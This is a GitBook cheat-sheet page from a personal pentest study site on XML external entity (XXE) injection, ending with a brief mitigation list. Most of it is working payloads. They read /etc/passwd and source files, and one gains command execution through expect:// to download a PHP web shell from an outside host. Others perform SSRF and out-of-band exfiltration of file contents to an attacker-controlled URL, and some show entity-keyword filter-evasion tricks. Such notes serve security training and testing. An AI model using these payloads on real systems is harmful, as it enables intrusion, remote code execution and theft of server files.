0Sec
0Sec
0Sec
  • Spider Security
  • offensive security
    • OSCP
      • WriteUps
        • PortSwigger
          • SQL injection labs
          • Exploiting XXE to retrieve data by repurposing a local DTD
        • PentesterLabs
          • Recon
        • HTB
          • BoardLight
          • Lame
        • THM
          • Walkthroughs
            • Attacktive Directory
            • LineKernel
            • Day 1 — Linux PrivEsc
          • CTF
            • Page
            • BLUE
            • mKingdom
            • RazorBlack
      • Module 1 (General Info)
      • Module 2 (Getting Kali)
        • Leason 1 - Booting Up Kali Linux
        • Leason 2 - The Kali Menu
        • Leason 4 - Finding Your Way Around Kali
        • Leason 5 - Managing Kali Linux Services
      • Module 3 (CLI)
        • The Bash Environment
        • Piping and Redirection
        • Text Searching and Manipulation
          • Regular
        • Managing Processes
        • File and Command Monitoring
      • Module 4 (Practical Tools)
        • Netcat
        • Socat
        • PowerShell & Powercat
        • Wireshark
        • Tcpdump
      • Module 5 (Bash Script)
      • Module 6 (Passive Info Gathering)
      • Module 7 ( Active Info Gathering)
      • Module 8 (Vulnerability Scanning)
      • Module 9 (Web Application Attacks)
        • Cross Site Scripting (XSS)
        • local file inclusion & remote file inclusion
          • Exploit LFI
        • SQL injection
          • Blind Boolean based SQL & Evasion Techniques
          • SQL
          • Login bypass List
        • File upload
        • Remote code execution
      • Module 10 ( Intro Buffer OverFlow)
      • Module 11 (Widows Buffer OverFlow)
        • Buffer OverFlow Challange
      • Module 12 (Linux Buffer OverFlows)
      • Module 13 (Clint Side Attacks)
      • Module 14 (Locating Public Exploits)
      • Module 15 (FIxing Exploits)
      • Module 16 (File Transfers)
      • Module 17 (Antivirus Evasion)
        • Windows
      • Module 18 (Privllege Escalation)
        • Windows
          • Checklist
          • THM - Windows PrivEsc Arena
        • Linux
          • Checklist
          • Linux PrivEsc Arena
      • Module 19 (Password Attacks)
      • Module 20 (Port Redirection and Tunneling)
      • Module 21 (Active Directory Attacks)
        • adbasics_v1.2
      • Module 22 (Metasploit Framwork)
      • Module 23 (Powershell Empire)
      • Course Materials
  • SANS
  • AppSec
    • EWAPTX
      • PHP Type Juggling
      • CSP
      • SqlI
        • Information_schema
        • WriteUps
      • SSTI & CSTI
      • XSS_HTML Injection
      • CORS Attack
      • Clickjacking
      • Open redirect
      • JSONP
      • LFI && LFD && RFI
      • HTTP Host header attacks
      • CSRF
      • XML injection
      • XML external entity (XXE) injection
      • APIs & JWT attacks
      • Insecure Deserialization
      • OAUTH 2.0 authentication vulnerabilities
      • Host Header Injection
      • Insecure Direct Object References (IDOR)
  • Reverse Eng & Malware dev
    • Internals
      • Windows internals
        • Topics in GitHub
        • Chapter 1 Concepts and tools
        • Chapter 2. System architecture
        • Chapter 3. Processes and jobs
        • Chapter 4. Threads
        • Chapter 5. Memory management
        • Chapter 6. I/O system
        • Chapter 7. Security
      • Linux internals ⇒ Soon
      • MacOs X internals ⇒ Soon
  • cheat sheet
    • Pentest_Notes
    • Linux BOF & Wireless Attacks
    • WriteUps
Powered by GitBook
On this page
  • Error Based XXE
  • Read File
  • Blind Data Exfiltration
  • PHP Filter
  • Code Execution
  • SSRF Attack
  • CDATA with XXE and SSRF
  • File Upload
  • OUT-OF_BAND (OOB)
  • Automated OOB Exfiltration
  • How to Find XEE
  • how to bypass if filters " ENTITY " word
  • Case1: Manipulation (Uppercase/Lowercase)
  • Case2: Encoding
  • How TO Test XXE Methodology
  • Mitigation and Prevention
  1. AppSec
  2. EWAPTX

XML external entity (XXE) injection

https://app.beeceptor.com/

PreviousXML injectionNextAPIs & JWT attacks

Last updated 8 months ago

Identifying

  1. Identify XML User Input: Look for web pages or forms that accept XML input from users. This can include forms that submit data in XML format to the server.

  2. Inspect Input Filtering and Sanitization: Check if the application applies proper input filtering or sanitization to XML input. Lack of filtering or sanitization increases the risk of XXE vulnerabilities.

  3. Observe Response Handling: Pay attention to how the application handles user input in the response. If the application reflects XML elements back to the user without encoding, it may be vulnerable to XXE.

  4. Analyze DTD Declaration: Determine if the XML input includes a Document Type Definition (DTD) declaration. If present, it may allow for entity declaration and expansion, leading to XXE.

  5. Add Custom Entity: Inject a custom entity into the XML input to test for XXE. This can be done by adding a DTD declaration and defining a new entity within it.

  6. Test Entity Replacement: Verify if the application replaces the custom entity with its defined value in the response. If the value of the entity is reflected back, it indicates potential XXE vulnerability.

  7. Check Content-Type: Even if the application primarily uses JSON format, try changing the Content-Type header to application/XML. Some applications may accept XML data even if they primarily handle JSON.

  8. Convert JSON to XML: If necessary, convert JSON data to XML format using online tools. Submit the XML data to the application and test for XXE vulnerabilities as described above.

Error Based XXE

Read File

<!--Linux -->
<?xml version="1.0"?>
<!DOCTYPE hacktor [<!ENTITY read  SYSTEM "file:///etc/passwd">]>
<check>
    <proid>&read;</proid>
</check>

Blind Data Exfiltration

PHP Filter 

<?xml version="1.0"?>
<!DOCTYPE hacktor [<!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=/index.php"> ]>
<Check><proid>&read;</proid></Check>

Code Execution

PHP Wrapper expect://ls

echo '<?php system($_REQUEST['cmd'])?>' > shell.php
#up server 
python3 -m http.server 80

to execute 

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'https://h3ckt00r.free.beeceptor.com/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

The expect module is not enabled/installed on modern PHP servers by default, so this attack may not always work.

SSRF Attack

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://sub.vulnerable.com/admin"> ]>
<stockCheck>
    <productId>&xxe;</productId>
    <storeId>1</storeId>
</stockCheck>

CDATA with XXE and SSRF

<?xml version="1.0"?>
<!DOCTYPE hacktor [ <!ENTITY read SYSTEM "https://h3ckt00r.free.beeceptor.com">]>
    <root>
        <data><![CDATA[&read;]]></data>
    </root>

File Upload

<!-- exploit.svg -->

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>

<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">

  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

OUT-OF_BAND (OOB)

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY % read SYSTEM "https://h3ckt00r.free.beeceptor.com/xxe.dtd" > ]>

in Server

<!DOCTYPE h3ckt00r [ <!ENTITY % read SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/passwd" > ]>
<!ENTITY % test "<!ENTITY &#x25; snedfile SYSTEM 'https://h3ckt00r.free.beeceptor.com/?x=%read;'>">
%test;
%sendfile;

Automated OOB Exfiltration

0xN1ghtM4r3@htb[/htb]$ ruby XXEinjector.rb --host=127.0.0.1 --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter

...SNIP...
[+] Sending a request with malicious XML.
[+] Responding with XML for: /etc/passwd
[+] Retrieved data:

How to Find XEE

● XML file upload (e.g config files)

● XML input fields

● XML based APIs

● XML based files (RSS, SVG)

how to bypass if filters " ENTITY " word

Case1: Manipulation (Uppercase/Lowercase)

<!eNtItY h3ckt00r SYSTEM "file:///etc/passwd">

Case2: Encoding

  • HTML encoding:

<!&#69;NTITY h3ckt00r SYSTEM "file:///etc/passwd">
<!-- e -> &#69; -->

  • Hexadecimal enconding

<!&#x45;NTITY h3ckt00r SYSTEM "file:///etc/passwd">
<!-- e -> &#x45; -->

  • Whitespace Bypasses (Extra Spaces or Newlines) Or using Comment

<!EN TITY h3ckt00r SYSTEM "file:///etc/passwd">
<!-- OR --> 
<!EN
TITY h3ckt00r SYSTEM "file:///etc/passwd">
<!-- OR using Comment -->
<!E<!-- Comment -->NTITY xxe SYSTEM "file:///etc/passwd">

  • CDATA

<!DOCTYPE root [
  <!ENTITY % data "<![CDATA[ENTITY]]">
  %data;
]>

How TO Test XXE Methodology

  1. Find XXE Data Entry Point

  2. Change the XML object to anything.

  3. Try to declare a reference entity or parameter entity. <!DOCTYPE hacktor [ <!ENTITY xxe SYSTEM "Hello">]>

  4. test Blind get server and add reference

  5. if now XML format test Xinclude

Mitigation and Prevention

  • Avoiding Outdated Components

  • Using Safe XML Configurations

    • Disable referencing custom Document Type Definitions (DTDs)

    • Disable referencing External XML Entities

    • Disable Parameter Entity processing => 

      • libxml_disable_entity_loader(true);

    • Disable support for XInclude

    • Prevent Entity Reference Loops